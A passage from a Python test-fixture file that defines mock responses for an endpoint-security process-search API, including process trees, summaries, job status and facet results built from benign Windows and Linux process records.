                    "cc4f6cbde75f08afdcefb95087149a5d",
                    "885557be148de55f6a127ea26ac457b9415e3e3baf30266d82b9d19b89e78ee4"
                ],
                "process_name": "c:\\program files\\windows defender\\mpcmdrun.exe",
                "process_pid": [
                    7544
                ],
                "process_reputation": "TRUSTED_WHITE_LIST",
                "process_start_time": "2020-12-02T05:45:15.531Z",
                "process_terminated": True,
                "process_username": [
                    "NT AUTHORITY\\LOCAL SERVICE"
                ],
                "regmod_count": 0,
                "scriptload_count": 0
            }
        ]
    },
    "contacted": 34,
    "completed": 34
}
# Mock process-tree response: a root node (Linux systemd fields at the bottom
# of "tree") with one child (msiexec.exe) in "children".
# NOTE(review): the child is a Windows process while the root carries LINUX
# device fields — looks like deliberately mixed fixture data; confirm against
# the consuming tests.
GET_PROCESS_TREE_STR = {
    "exception": "",
    "tree": {
        "children": [
            {
                "_process_filename": "msiexec.exe",
                "backend_timestamp": "2020-10-15T05:44:47.387Z",
                "device_external_ip": "144.121.3.50",
                "device_group": "schumaker-test",
                "device_group_id": 1706,
                "device_id": 199106,
                "device_internal_ip": "10.210.161.66",
                "device_name": "w10prov1703x86",
                "device_os": "WINDOWS",
                "device_policy": "default",
                "device_policy_id": 2198,
                "device_timestamp": "2020-10-15T05:43:45.336Z",
                "enriched": True,
                "enriched_event_type": "SYSTEM_API_CALL",
                "event_type": "crossproc",
                "has_children": False,
                "ingress_time": 1602740641018,
                "legacy": True,
                "org_id": "WNEXFKQ7",
                "parent_guid": "WNEXFKQ7-000309c2-000002c4-00000000-1d6a1c1f161a86a",
                "parent_hash": [
                    "bd3036f60f1438c82900a29221e3a4912a89bfe904d01aad70c781ef514df0b3"
                ],
                "parent_name": "c:\\windows\\system32\\services.exe",
                "parent_pid": 708,
                "process_cmdline":[
                    "C:\\WINDOWS\\system32\\msiexec.exe /V"
                ],
                "process_effective_reputation": "TRUSTED_WHITE_LIST",
                "process_guid": "WNEXFKQ7-000309c2-00000454-00000000-1d6a2b6252ba18e",
                "process_hash":[
                    "f9a3eee1c3a4067702bc9a59bc894285",
                    "8e2aa014d7729cbfee95671717646ee480561f22e2147dae87a75c18d7369d99"
                ],
                "process_name": "c:\\windows\\system32\\msiexec.exe",
                "process_pid":[
                    1108
                ],
                "process_reputation": "TRUSTED_WHITE_LIST",
                "process_start_time": "2020-10-15T05:43:44.537Z",
                "process_username": [
                    "NT AUTHORITY\\SYSTEM"
                ],
                "ttp":[
                    "ENUMERATE_PROCESSES",
                    "MITRE_T1057_PROCESS_DISCOVERY"
                ]
            }
        ],
        "device_id": 176678,
        "device_name": "devr-dev",
        "device_os": "LINUX",
        "device_policy": "sm-restrictive",
        "device_policy_id": 11200,
        "device_timestamp": "2020-08-28T19:10:02.123Z",
        "filemod_count": 0,
        "has_children": True,
        "hits": False,
        "ingress_time": 1598641901273,
        "modload_count": 0,
        "netconn_count": 0,
        "org_id": "ABCD1234",
        "process_effective_reputation": "NOT_LISTED",
        "process_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
        "process_hash": [
            "e4b9902024ac32b3ca37f6b4c9b841e8",
            "81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85"
        ],
        "process_name": "/usr/lib/systemd/systemd",
        "process_pid": [1],
        "process_reputation": "NOT_LISTED",
        "process_start_time": "2020-05-04T21:34:03.968Z",
        "regmod_count": 0,
        "scriptload_count": 0
    }
}
# Mock process-summary response with enriched-event fields (enriched,
# event_type, sensor_action, ttp) on process/siblings/children.
# NOTE(review): "summary" also carries a bare top-level "process_guid" key
# after "children" — presumably intentional fixture data; confirm against the
# consuming tests.
GET_PROCESS_SUMMARY_STR = {
    "exception": "",
    "summary": {
        "process": {
            "_process_filename": "svchost.exe",
            "backend_timestamp": "2020-10-22T16:27:52.931Z",
            "device_external_ip": "144.121.3.50",
            "device_group_id": 0,
            "device_id": 199106,
            "device_internal_ip": "10.210.161.66",
            "device_name": "w10prov1703x86",
            "device_os": "WINDOWS",
            "device_policy": "lyon_test",
            "device_policy_id": 30241,
            "device_timestamp": "2020-10-22T16:15:05.925Z",
            "enriched": True,
            "enriched_event_type": "NETWORK",
            "event_type": "netconn",
            "has_children": True,
            "hits": True,
            "ingress_time": 1603384040142,
            "legacy": True,
            "org_id": "WNEXFKQ7",
            "parent_guid": "WNEXFKQ7-000309c2-000002c4-00000000-1d6a1c1f161a86a",
            "parent_hash": [
                "bd3036f60f1438c82900a29221e3a4912a89bfe904d01aad70c781ef514df0b3"
            ],
            "parent_name": "c:\\windows\\system32\\services.exe",
            "parent_pid": 708,
            "process_cmdline": [
                "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p"
            ],
            "process_effective_reputation": "TRUSTED_WHITE_LIST",
            "process_guid": "WNEXFKQ7-000309c2-00000478-00000000-1d6a1c1f2b02805",
            "process_hash": [
                "a7296c1245ee76768d581c6330dade06",
                "5be0de7f915ba819d4ba048db7a2a87f6f3253fdd4865dc418181a0d6a031caa"
            ],
            "process_name": "c:\\windows\\system32\\svchost.exe",
            "process_pid": [
                1144
            ],
            "process_reputation": "TRUSTED_WHITE_LIST",
            "process_start_time": "2020-10-14T00:35:42.639Z",
            "process_username": [
                "NT AUTHORITY\\SYSTEM"
            ],
            "sensor_action": [
                "DENY",
                "BLOCK"
            ],
            "ttp": [
                "POLICY_DENY"
            ]
        },
        "siblings": [
            {
                "_process_filename": "cb.exe",
                "backend_timestamp": "2020-10-22T16:14:38.964Z",
                "device_external_ip": "144.121.3.50",
                "device_group_id": 0,
                "device_id": 199106,
                "device_name": "w10prov1703x86",
                "device_os": "WINDOWS",
                "device_policy": "lyon_test",
                "device_policy_id": 30241,
                "device_timestamp": "2020-10-22T16:11:30.514Z",
                "enriched": True,
                "enriched_event_type": "NETWORK",
                "event_type": "netconn",
                "has_children": False,
                "hits": False,
                "ingress_time": 1603383254356,
                "legacy": True,
                "org_id": "WNEXFKQ7",
                "parent_guid": "WNEXFKQ7-000309c2-000002c4-00000000-1d6a1c1f161a86a",
                "parent_hash": [
                    "bd3036f60f1438c82900a29221e3a4912a89bfe904d01aad70c781ef514df0b3"
                ],
                "parent_name": "c:\\windows\\system32\\services.exe",
                "parent_pid": 708,
                "process_cmdline": [
                    "C:\\WINDOWS\\CarbonBlack\\cb.exe"
                ],
                "process_effective_reputation": "TRUSTED_WHITE_LIST",
                "process_guid": "WNEXFKQ7-000309c2-00000980-00000000-1d6a1c1f41ae014",
                "process_hash": [
                    "b5a2c3084251ad5ce53e02f071fa7dc9",
                    "ae600593a0a6915cf5ecbf96b4cb1d0e1d165339bde136c351bf606127c5dcec"
                ],
                "process_name": "c:\\windows\\carbonblack\\cb.exe",
                "process_pid": [
                    2432
                ],
                "process_reputation": "TRUSTED_WHITE_LIST",
                "process_start_time": "2020-10-14T00:35:45.017Z",
                "process_username": [
                    "NT AUTHORITY\\SYSTEM"
                ],
                "sensor_action": [
                    "DENY",
                    "BLOCK"
                ],
                "ttp": [
                    "POLICY_DENY"
                ]
            }
        ],
        # Parent is a Linux systemd record, unlike the Windows process above —
        # presumably intentional mixed fixture data.
        "parent": {
            "_process_filename": "systemd",
            "backend_timestamp": "2020-08-28T19:12:07.989Z",
            "childproc_count": 0,
            "crossproc_count": 0,
            "device_external_ip": "34.56.78.90",
            "device_group_id": 0,
            "device_id": 176678,
            "device_name": "devr-dev",
            "device_os": "LINUX",
            "device_policy": "sm-restrictive",
            "device_policy_id": 11200,
            "device_timestamp": "2020-08-28T19:10:02.123Z",
            "filemod_count": 0,
            "has_children": True,
            "hits": False,
            "ingress_time": 1598641901273,
            "modload_count": 0,
            "netconn_count": 0,
            "org_id": "ABCD1234",
            "process_effective_reputation": "NOT_LISTED",
            "process_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
            "process_hash": [
                "e4b9902024ac32b3ca37f6b4c9b841e8",
                "81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85"
            ],
            "process_name": "/usr/lib/systemd/systemd",
            "process_pid": [
                1
            ],
            "process_reputation": "NOT_LISTED",
            "process_start_time": "2020-05-04T21:34:03.968Z",
            "regmod_count": 0,
            "scriptload_count": 0
        },
        "children": [
            {
                "_process_filename": "wermgr.exe",
                "backend_timestamp": "2020-10-22T16:28:23.556Z",
                "device_external_ip": "144.121.3.50",
                "device_group_id": 0,
                "device_id": 199106,
                "device_internal_ip": "10.210.161.66",
                "device_name": "w10prov1703x86",
                "device_os": "WINDOWS",
                "device_policy": "lyon_test",
                "device_policy_id": 30241,
                "device_timestamp": "2020-10-22T16:15:06.065Z",
                "enriched": True,
                "enriched_event_type": "NETWORK",
                "event_type": "netconn",
                "has_children": False,
                "hits": True,
                "ingress_time": 1603384060202,
                "legacy": True,
                "org_id": "WNEXFKQ7",
                "parent_guid": "WNEXFKQ7-000309c2-00000478-00000000-1d6a1c1f2b02805",
                "parent_hash": [
                    "5be0de7f915ba819d4ba048db7a2a87f6f3253fdd4865dc418181a0d6a031caa"
                ],
                "parent_name": "c:\\windows\\system32\\svchost.exe",
                "parent_pid": 1144,
                "process_cmdline":[
                    "C:\\WINDOWS\\system32\\wermgr.exe -upload"
                ],
                "process_effective_reputation": "TRUSTED_WHITE_LIST",
                "process_guid": "WNEXFKQ7-000309c2-000004f8-00000000-1d6a88e80c541a3",
                "process_hash":[
                    "2ae75e810f4dd1fb36607f66e7e1d80b",
                    "db703055ec0641e7e96e22a62bf075547b480c51ea9e163d94e33452894b885c"
                ],
                "process_name": "c:\\windows\\system32\\wermgr.exe",
                "process_pid":[
                    1272
                ],
                "process_reputation": "TRUSTED_WHITE_LIST",
                "process_start_time": "2020-10-22T16:15:05.324Z",
                "process_username":[
                    "NT AUTHORITY\\SYSTEM"
                ],
                "sensor_action":[
                    "DENY",
                    "BLOCK"
                ],
                "ttp":[
                    "POLICY_DENY"
                ]
            }
        ],
        "process_guid": "b31019a5-d69b-4aba-b36d-0b29fe2e7f61"
    }
}
# Mock process-summary response whose "children" section is None (rather than
# an empty list) — exercises the no-children code path in consumers. The
# process/siblings/parent sections mirror GET_PROCESS_SUMMARY_RESP_2's data.
GET_PROCESS_SUMMARY_RESP_NO_CHILDREN = {
    "exception": "",
    "summary": {
        "process": {
            "_process_filename": "svchost.exe",
            "backend_timestamp": "2020-12-03T20:34:38.889Z",
            "childproc_count": 3,
            "crossproc_count": 40,
            "device_external_ip": "24.243.76.124",
            "device_group_id": 0,
            "device_id": 329219,
            "device_internal_ip": "172.16.115.191",
            "device_name": "desktop-8qonquj",
            "device_os": "WINDOWS",
            "device_policy": "default",
            "device_policy_id": 2198,
            "device_timestamp": "2020-12-03T20:32:20.912Z",
            "filemod_count": 0,
            "has_children": True,
            "hits": False,
            "ingress_time": 1607027652665,
            "modload_count": 101,
            "netconn_count": 0,
            "org_id": "WNEXFKQ7",
            "parent_guid": "WNEXFKQ7-00050603-00000270-00000000-1d6c86e280fbff8",
            "parent_hash": [
                "1b6ffe1f5480675fc618b42247ef49a1c60ca99d2d53271b3472557e3bea2e8a",
                "2bd115a27b60b74bbeb31013519ac199"
            ],
            "parent_name": "c:\\windows\\system32\\services.exe",
            "parent_pid": 624,
            "process_cmdline": [
                "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc"
            ],
            "process_effective_reputation": "TRUSTED_WHITE_LIST",
            "process_guid": "WNEXFKQ7-00050603-00000b6c-00000000-1d6c86e29731218",
            "process_hash": [
                "45684336325dc8eadfb1e8ff876921c4",
                "dd191a5b23df92e12a8852291f9fb5ed594b76a28a5a464418442584afd1e048"
            ],
            "process_name": "c:\\windows\\system32\\svchost.exe",
            "process_pid": [
                788
            ],
            "process_reputation": "TRUSTED_WHITE_LIST",
            "process_start_time": "2020-12-02T05:44:12.137Z",
            "process_username": [
                "NT AUTHORITY\\LOCAL SERVICE"
            ],
            "regmod_count": 5,
            "scriptload_count": 0
        },
        "siblings": [
            {
                "_process_filename": "spoolsv.exe",
                "backend_timestamp": "2020-12-03T20:34:38.889Z",
                "childproc_count": 2,
                "crossproc_count": 35,
                "device_external_ip": "24.243.76.124",
                "device_group_id": 0,
                "device_id": 329219,
                "device_internal_ip": "172.16.115.191",
                "device_name": "desktop-8qonquj",
                "device_os": "WINDOWS",
                "device_policy": "default",
                "device_policy_id": 2198,
                "device_timestamp": "2020-12-03T20:32:18.693Z",
                "filemod_count": 405,
                "has_children": True,
                "hits": False,
                "ingress_time": 1607027652665,
                "modload_count": 382,
                "netconn_count": 0,
                "org_id": "WNEXFKQ7",
                "parent_guid": "WNEXFKQ7-00050603-00000270-00000000-1d6c86e280fbff8",
                "parent_hash": [
                    "1b6ffe1f5480675fc618b42247ef49a1c60ca99d2d53271b3472557e3bea2e8a",
                    "2bd115a27b60b74bbeb31013519ac199"
                ],
                "parent_name": "c:\\windows\\system32\\services.exe",
                "parent_pid": 624,
                "process_cmdline": [
                    "C:\\Windows\\System32\\spoolsv.exe"
                ],
                "process_effective_reputation": "LOCAL_WHITE",
                "process_guid": "WNEXFKQ7-00050603-00000944-00000000-1d6c86e29169d10",
                "process_hash": [
                    "94170797d822cd195f8f92da9def082f",
                    "f45ca80e151494a7394dcd1958ee94c0b83fe3f7b9e281fa1e626e71ff6c2604"
                ],
                "process_name": "c:\\windows\\system32\\spoolsv.exe",
                "process_pid": [
                    2372
                ],
                "process_reputation": "COMMON_WHITE_LIST",
                "process_start_time": "2020-12-02T05:44:11.531Z",
                "process_username": [
                    "NT AUTHORITY\\SYSTEM"
                ],
                "regmod_count": 445,
                "scriptload_count": 0
            },
            {
                "_process_filename": "wmiapsrv.exe",
                "backend_timestamp": "2020-12-02T06:00:54.384Z",
                "childproc_count": 0,
                "crossproc_count": 3,
                "device_external_ip": "24.243.76.124",
                "device_group": "schumaker-test",
                "device_group_id": 1706,
                "device_id": 329219,
                "device_internal_ip": "172.16.115.191",
                "device_name": "desktop-8qonquj",
                "device_os": "WINDOWS",
                "device_policy": "default",
                "device_policy_id": 2198,
                "device_timestamp": "2020-12-02T05:46:50.369Z",
                "filemod_count": 0,
                "has_children": False,
                "ingress_time": 1606888837162,
                "modload_count": 21,
                "netconn_count": 0,
                "org_id": "WNEXFKQ7",
                "parent_guid": "WNEXFKQ7-00050603-00000270-00000000-1d6c86e280fbff8",
                "parent_hash": [
                    "1b6ffe1f5480675fc618b42247ef49a1c60ca99d2d53271b3472557e3bea2e8a",
                    "2bd115a27b60b74bbeb31013519ac199"
                ],
                "parent_name": "c:\\windows\\system32\\services.exe",
                "parent_pid": 624,
                "process_cmdline": [
                    "C:\\Windows\\system32\\wbem\\WmiApSrv.exe"
                ],
                "process_effective_reputation": "LOCAL_WHITE",
                "process_guid": "WNEXFKQ7-00050603-000020f8-00000000-1d6c86e87b1e2be",
                "process_hash": [
                    "55e21dfb7ec2394903e5ca62fdca21e6",
                    "55c2021f06d28696843672ff90e242c33c4cf6d30cdf0b2d9dcf07d8282cfc19"
                ],
                "process_name": "c:\\windows\\system32\\wbem\\wmiapsrv.exe",
                "process_pid": [
                    8440
                ],
                "process_reputation": "ADAPTIVE_WHITE_LIST",
                "process_start_time": "2020-12-02T05:46:50.254Z",
                "process_terminated": True,
                "process_username": [
                    "NT AUTHORITY\\SYSTEM"
                ],
                "regmod_count": 1,
                "scriptload_count": 0
            }
        ],
        "parent": {
            "_process_filename": "services.exe",
            "backend_timestamp": "2020-12-03T20:34:38.889Z",
            "childproc_count": 243,
            "crossproc_count": 39,
            "device_external_ip": "24.243.76.124",
            "device_group_id": 0,
            "device_id": 329219,
            "device_internal_ip": "172.16.115.191",
            "device_name": "desktop-8qonquj",
            "device_os": "WINDOWS",
            "device_policy": "default",
            "device_policy_id": 2198,
            "device_timestamp": "2020-12-03T20:32:13.397Z",
            "filemod_count": 0,
            "has_children": True,
            "hits": False,
            "ingress_time": 1607027652665,
            "modload_count": 53,
            "netconn_count": 0,
            "org_id": "WNEXFKQ7",
            "parent_guid": "WNEXFKQ7-00050603-000001fc-00000000-1d6c86e2801246d",
            "parent_hash": [
                "d5e122606054fa0b03db3ee8cf9ea7701e523875e2bdb87581ad7232ffc9308e",
                "e83650f70459a027aa596e1a73c961a1"
            ],
            "parent_name": "c:\\windows\\system32\\wininit.exe",
            "parent_pid": 508,
            "process_cmdline": [
                "C:\\Windows\\system32\\services.exe"
            ],
            "process_effective_reputation": "TRUSTED_WHITE_LIST",
            "process_guid": "WNEXFKQ7-00050603-00000270-00000000-1d6c86e280fbff8",
            "process_hash": [
                "2bd115a27b60b74bbeb31013519ac199",
                "1b6ffe1f5480675fc618b42247ef49a1c60ca99d2d53271b3472557e3bea2e8a"
            ],
            "process_name": "c:\\windows\\system32\\services.exe",
            "process_pid": [
                624
            ],
            "process_reputation": "TRUSTED_WHITE_LIST",
            "process_start_time": "2020-12-02T05:44:09.808Z",
            "process_username": [
                "NT AUTHORITY\\SYSTEM"
            ],
            "regmod_count": 254,
            "scriptload_count": 0
        },
        # None (not []) — the distinguishing feature of this fixture.
        "children": None
    },
    "contacted": 34,
    "completed": 34
}
# Mock tree response: "summary" sections are all None while "tree" carries the
# root process (ngen.exe) with one nested child (mscorsvw.exe) in "children".
GET_TREE_RESP = {
    "exception": "",
    "summary": {
        "process": None,
        "siblings": None,
        "parent": None,
        "children": None
    },
    "tree": {
        "_process_filename": "ngen.exe",
        "backend_timestamp": "2020-12-03T19:47:23.199Z",
        "childproc_count": 1,
        "children": [
            {
                "_process_filename": "mscorsvw.exe",
                "backend_timestamp": "2020-12-03T19:47:23.199Z",
                "childproc_count": 0,
                "children": [],
                "crossproc_count": 3,
                "device_external_ip": "24.243.76.124",
                "device_group_id": 0,
                "device_id": 329219,
                "device_internal_ip": "172.16.115.191",
                "device_name": "desktop-8qonquj",
                "device_os": "WINDOWS",
                "device_policy": "default",
                "device_policy_id": 2198,
                "device_timestamp": "2020-12-03T19:44:25.004Z",
                "filemod_count": 0,
                "has_children": False,
                "ingress_time": 1607024805760,
                "modload_count": 14,
                "netconn_count": 0,
                "org_id": "WNEXFKQ7",
                "parent_guid": "WNEXFKQ7-00050603-000008a0-00000000-1d6c9acb438f08d",
                "parent_hash": [
                    "0eb067650f90e1af3b660c229a58d5e4c505a928847349e06dadb5e88df713f4",
                    "660254c8228b83705c80374d47f570f1"
                ],
                "parent_name": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\ngen.exe",
                "parent_pid": 2208,
                # Adjacent string literals are implicitly concatenated into one
                # command-line entry.
                "process_cmdline": [
                    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe"
                    " -StartupEvent 1b4 -InterruptEvent 0 -NGENProcess 168 -Pipe 174 -Comment \"NGen Worker Process\""
                ],
                "process_effective_reputation": "TRUSTED_WHITE_LIST",
                "process_guid": "WNEXFKQ7-00050603-0000066c-00000000-1d6c9acb43e29bb",
                "process_hash": [
                    "a0b98e5e57de8f666a04ac3eec86d25b",
                    "60def9905f16bd5d10684afea17ab3a9accdd8ba4a6e06240e84e3acb5f94e3d"
                ],
                "process_name": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscorsvw.exe",
                "process_pid": [
                    1644
                ],
                "process_reputation": "TRUSTED_WHITE_LIST",
                "process_start_time": "2020-12-03T19:44:24.953Z",
                "process_terminated": True,
                "process_username": [
                    "NT AUTHORITY\\SYSTEM"
                ],
                "regmod_count": 0,
                "scriptload_count": 0
            }
        ],
        "crossproc_count": 4,
        "device_external_ip": "24.243.76.124",
        "device_group_id": 0,
        "device_id": 329219,
        "device_internal_ip": "172.16.115.191",
        "device_name": "desktop-8qonquj",
        "device_os": "WINDOWS",
        "device_policy": "default",
        "device_policy_id": 2198,
        "device_timestamp": "2020-12-03T19:44:25.020Z",
        "filemod_count": 5,
        "has_children": True,
        "hits": False,
        "ingress_time": 1607024805760,
        "modload_count": 11,
        "netconn_count": 0,
        "org_id": "WNEXFKQ7",
        "parent_guid": "WNEXFKQ7-00050603-000023fc-00000000-1d6c9acae2c7003",
        "parent_hash": [
            "6e4b6d2af6d99dcc1de0e097ea51d43a",
            "c4db063d8de31c0a64d172950f857509ee97baa488d8678d48eb6e75b17527b0"
        ],
        "parent_name": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\ngentask.exe",
        "parent_pid": 9212,
        # Adjacent string literals are implicitly concatenated into one
        # command-line entry.
        "process_cmdline": [
            "\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\" "
            "install \"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken="
            "b77a5c561934e089\" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior"
        ],
        "process_effective_reputation": "TRUSTED_WHITE_LIST",
        "process_guid": "WNEXFKQ7-00050603-000008a0-00000000-1d6c9acb438f08d",
        "process_hash": [
            "660254c8228b83705c80374d47f570f1",
            "0eb067650f90e1af3b660c229a58d5e4c505a928847349e06dadb5e88df713f4"
        ],
        "process_name": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\ngen.exe",
        "process_pid": [
            2208
        ],
        "process_reputation": "TRUSTED_WHITE_LIST",
        "process_start_time": "2020-12-03T19:44:24.919Z",
        "process_terminated": True,
        "process_username": [
            "NT AUTHORITY\\SYSTEM"
        ],
        "regmod_count": 0,
        "scriptload_count": 0
    },
    "contacted": 34,
    "completed": 34
}
# Mock response for a process lookup that failed: the exception code is set
# and every summary section is None.
GET_PROCESS_NOT_FOUND = dict(
    exception="NOT_FOUND",
    summary=dict(process=None, siblings=None, parent=None, children=None),
    contacted=33,
    completed=33,
)
# Mock response for a process-summary lookup that failed: NOT_FOUND exception
# with all summary sections None.
GET_PROCESS_SUMMARY_NOT_FOUND = dict(
    exception="NOT_FOUND",
    summary=dict(process=None, siblings=None, parent=None, children=None),
    contacted=33,
    completed=33,
)
# Mock response to submitting a process-details job: only the job identifier.
POST_PROCESS_DETAILS_JOB_RESP = {"job_id": "ccc47a52-9a61-4c77-8652-8a03dc187b98"}
# Mock job-status response for a finished job (contacted == completed).
GET_PROCESS_DETAILS_JOB_STATUS_RESP = dict(contacted=16, completed=16)
# Mock job-status response for a job still running (completed < contacted).
GET_PROCESS_DETAILS_JOB_STATUS_IN_PROGRESS_RESP = dict(contacted=16, completed=8)
# Mock response: completed process-details job that found a single process.
GET_PROCESS_DETAILS_JOB_RESULTS_RESP = {
    "contacted": 16,
    "completed": 16,
    "num_available": 1,
    "num_found": 1,
    "results": [
        {
            "backend_timestamp": "2020-08-28T19:14:40.394Z",
            "childproc_count": 333576, "crossproc_count": 0,
            "device_external_ip": "34.56.78.90", "device_group_id": 0,
            "device_id": 176678, "device_location": "UNKNOWN",
            "device_name": "devr-dev", "device_os": "LINUX",
            "device_os_version": "CentOS 7.6-1810",
            "device_policy": "sm-restrictive", "device_policy_id": 11200,
            "device_target_priority": "MEDIUM",
            "device_timestamp": "2020-08-28T19:12:41.178Z",
            "document_guid": "6Gqoe-abQXu-k9LagGOoQg",
            "filemod_count": 0, "ingress_time": 1598642021337,
            "modload_count": 0, "netconn_count": 0, "org_id": "test",
            "parent_effective_reputation": "NOT_LISTED",
            "parent_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
            "parent_hash": [
                "81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85",
                "e4b9902024ac32b3ca37f6b4c9b841e8"
            ],
            "parent_name": "/usr/lib/systemd/systemd", "parent_pid": 1,
            "parent_publisher_state": ["FILE_SIGNATURE_STATE_NOT_SIGNED"],
            "parent_reputation": "NOT_LISTED",
            "process_cmdline": ["/usr/bin/gitea"],
            "process_cmdline_length": [14],
            "process_effective_reputation": "NOT_LISTED",
            "process_guid": "80dab519-3b5f-4502-afad-da87cd58a4c3",
            "process_hash": [
                "285044ad8f8b9322d0cc5e929e2cc18c",
                "5975d972eea6b1c53ef9a69452797439ed5bf63fae72e1780761ea1c2cb6976a"
            ],
            "process_name": "/usr/bin/bash",
            "process_pid": [10111, 10222, 10333],
            "process_publisher_state": ["FILE_SIGNATURE_STATE_NOT_SIGNED"],
            "process_reputation": "NOT_LISTED",
            "process_sha256": "5975d972eea6b1c53ef9a69452797439ed5bf63fae72e1780761ea1c2cb6976a",
            "process_start_time": "2020-05-04T21:34:03.968Z",
            "process_username": ["root"],
            "regmod_count": 0, "scriptload_count": 0
        }
    ]
}
# Mock response: process-details job results with no matches at all.
GET_PROCESS_DETAILS_JOB_RESULTS_RESP_ZERO = {
    "contacted": 0, "completed": 0,
    "num_available": 0, "num_found": 0,
    "results": []
}
# Mock response: facet search with one daily-bucketed range facet and two
# term facets (backend_timestamp and device_timestamp).
GET_FACET_SEARCH_RESULTS_RESP = {
    "ranges": [
        {
            "start": "2020-10-20T00:00:00Z",
            "end": "2020-11-12T00:00:00Z",
            "bucket_size": "+1DAY",
            "field": "backend_timestamp",
            "values": [
                {"total": 1555, "name": "2020-10-20T00:00:00Z"},
                {"total": 1970, "name": "2020-10-21T00:00:00Z"},
                {"total": 7727, "name": "2020-10-22T00:00:00Z"},
                {"total": 2453, "name": "2020-10-23T00:00:00Z"},
                {"total": 37, "name": "2020-11-11T00:00:00Z"}
            ]
        }
    ],
    "terms": [
        {
            "values": [
                {"total": 797, "id": "2020-10-22T20:56:31.215Z", "name": "2020-10-22T20:56:31.215Z"},
                {"total": 708, "id": "2020-10-19T22:35:43.547Z", "name": "2020-10-19T22:35:43.547Z"},
                {"total": 518, "id": "2020-10-09T14:17:55.189Z", "name": "2020-10-09T14:17:55.189Z"},
                {"total": 83, "id": "2020-11-12T01:40:04.682Z", "name": "2020-11-12T01:40:04.682Z"},
                {"total": 26, "id": "2020-07-30T14:15:50.415Z", "name": "2020-07-30T14:15:50.415Z"},
                {"total": 9, "id": "2020-10-20T18:09:58.469Z", "name": "2020-10-20T18:09:58.469Z"},
                {"total": 9, "id": "2020-10-23T05:48:32.744Z", "name": "2020-10-23T05:48:32.744Z"},
                {"total": 8, "id": "2020-08-24T18:46:30.369Z", "name": "2020-08-24T18:46:30.369Z"},
                {"total": 7, "id": "2020-09-23T15:03:29.263Z", "name": "2020-09-23T15:03:29.263Z"}
            ],
            "field": "backend_timestamp"
        },
        {
            "values": [
                {"total": 38, "id": "2020-10-19T21:25:06.668Z", "name": "2020-10-19T21:25:06.668Z"},
                {"total": 13, "id": "2020-10-22T20:48:22.188Z", "name": "2020-10-22T20:48:22.188Z"},
                {"total": 5, "id": "2020-07-30T14:12:47.986Z", "name": "2020-07-30T14:12:47.986Z"},
                {"total": 4, "id": "2020-11-12T01:38:10.788Z", "name": "2020-11-12T01:38:10.788Z"},
                {"total": 2, "id": "2020-07-30T14:10:41.125Z", "name": "2020-07-30T14:10:41.125Z"},
                {"total": 2, "id": "2020-09-23T15:05:23.758Z", "name": "2020-09-23T15:05:23.758Z"},
                {"total": 2, "id": "2020-10-20T15:53:30.260Z", "name": "2020-10-20T15:53:30.260Z"},
                {"total": 1, "id": "2020-10-23T05:36:34.300Z", "name": "2020-10-23T05:36:34.300Z"},
                {"total": 1, "id": "2020-08-24T17:32:31.211Z", "name": "2020-08-24T17:32:31.211Z"}
            ],
            "field": "device_timestamp"
        }
    ],
    "num_found": 23753,
    "contacted": 36,
    "completed": 36
}
# Expected term-facet values, keyed by field, matching the "terms" section of
# GET_FACET_SEARCH_RESULTS_RESP.
EXPECTED_PROCESS_FACETS = {
    "backend_timestamp": [
        {"total": 797, "id": "2020-10-22T20:56:31.215Z", "name": "2020-10-22T20:56:31.215Z"},
        {"total": 708, "id": "2020-10-19T22:35:43.547Z", "name": "2020-10-19T22:35:43.547Z"},
        {"total": 518, "id": "2020-10-09T14:17:55.189Z", "name": "2020-10-09T14:17:55.189Z"},
        {"total": 83, "id": "2020-11-12T01:40:04.682Z", "name": "2020-11-12T01:40:04.682Z"},
        {"total": 26, "id": "2020-07-30T14:15:50.415Z", "name": "2020-07-30T14:15:50.415Z"},
        {"total": 9, "id": "2020-10-20T18:09:58.469Z", "name": "2020-10-20T18:09:58.469Z"},
        {"total": 9, "id": "2020-10-23T05:48:32.744Z", "name": "2020-10-23T05:48:32.744Z"},
        {"total": 8, "id": "2020-08-24T18:46:30.369Z", "name": "2020-08-24T18:46:30.369Z"},
        {"total": 7, "id": "2020-09-23T15:03:29.263Z", "name": "2020-09-23T15:03:29.263Z"}
    ],
    "device_timestamp": [
        {"total": 38, "id": "2020-10-19T21:25:06.668Z", "name": "2020-10-19T21:25:06.668Z"},
        {"total": 13, "id": "2020-10-22T20:48:22.188Z", "name": "2020-10-22T20:48:22.188Z"},
        {"total": 5, "id": "2020-07-30T14:12:47.986Z", "name": "2020-07-30T14:12:47.986Z"},
        {"total": 4, "id": "2020-11-12T01:38:10.788Z", "name": "2020-11-12T01:38:10.788Z"},
        {"total": 2, "id": "2020-07-30T14:10:41.125Z", "name": "2020-07-30T14:10:41.125Z"},
        {"total": 2, "id": "2020-09-23T15:05:23.758Z", "name": "2020-09-23T15:05:23.758Z"},
        {"total": 2, "id": "2020-10-20T15:53:30.260Z", "name": "2020-10-20T15:53:30.260Z"},
        {"total": 1, "id": "2020-10-23T05:36:34.300Z", "name": "2020-10-23T05:36:34.300Z"},
        {"total": 1, "id": "2020-08-24T17:32:31.211Z", "name": "2020-08-24T17:32:31.211Z"}
    ]
}
# Expected range-facet values, keyed by field, matching the "ranges" section
# of GET_FACET_SEARCH_RESULTS_RESP.
EXPECTED_PROCESS_RANGES_FACETS = {
    "backend_timestamp": [
        {"total": 1555, "name": "2020-10-20T00:00:00Z"},
        {"total": 1970, "name": "2020-10-21T00:00:00Z"},
        {"total": 7727, "name": "2020-10-22T00:00:00Z"},
